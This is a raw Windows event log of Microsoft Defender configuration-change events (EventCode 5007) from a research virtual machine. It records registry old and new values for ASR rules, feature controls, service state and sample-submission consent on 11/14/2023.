New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=454
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
11/14/2023 09:17:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=453
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
11/14/2023 09:00:13 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=452
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
New value: Default\ServiceStartStates = 0x0
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=451
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\EnableUpdateResiliency = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\EnableUpdateResiliency = 0x0
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=450
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\31 = 0x901
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=449
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\22 = 0x3E
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=448
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_4 = 0x1
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=447
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\10 = 0x1
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=446
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_9 = 0x1
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=445
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\32 = 0x36B0
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=444
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_7 = 0x1
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=443
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
11/14/2023 08:59:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=442
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation = C:\Program Files\Windows Defender\
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation = C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\
11/14/2023 08:59:13 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=441
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
11/14/2023 08:59:11 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=440
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/14/2023 08:59:03 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=438
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/14/2023 08:59:00 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=437
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
11/14/2023 08:58:48 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=431
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Miscellaneous Configuration\BddUpdateFailure = 0x0
11/14/2023 08:58:48 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=430
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Miscellaneous Configuration\DeltaUpdateFailure = 0x0
11/14/2023 08:58:47 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=429
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\15 = 0x1
11/14/2023 08:58:47 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=428
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\13 = 0x1
11/14/2023 08:58:47 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=427
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\9 = 0x1
11/14/2023 08:58:47 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=426
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\7 = 0x1
11/14/2023 08:58:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=422
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\MpEngine\MpEngineRing = 0x2
New value:
11/14/2023 08:58:41 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=421
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\MpEngine\MpCampRing = 0x2
New value:
11/14/2023 07:06:31 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=259
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent = 0x0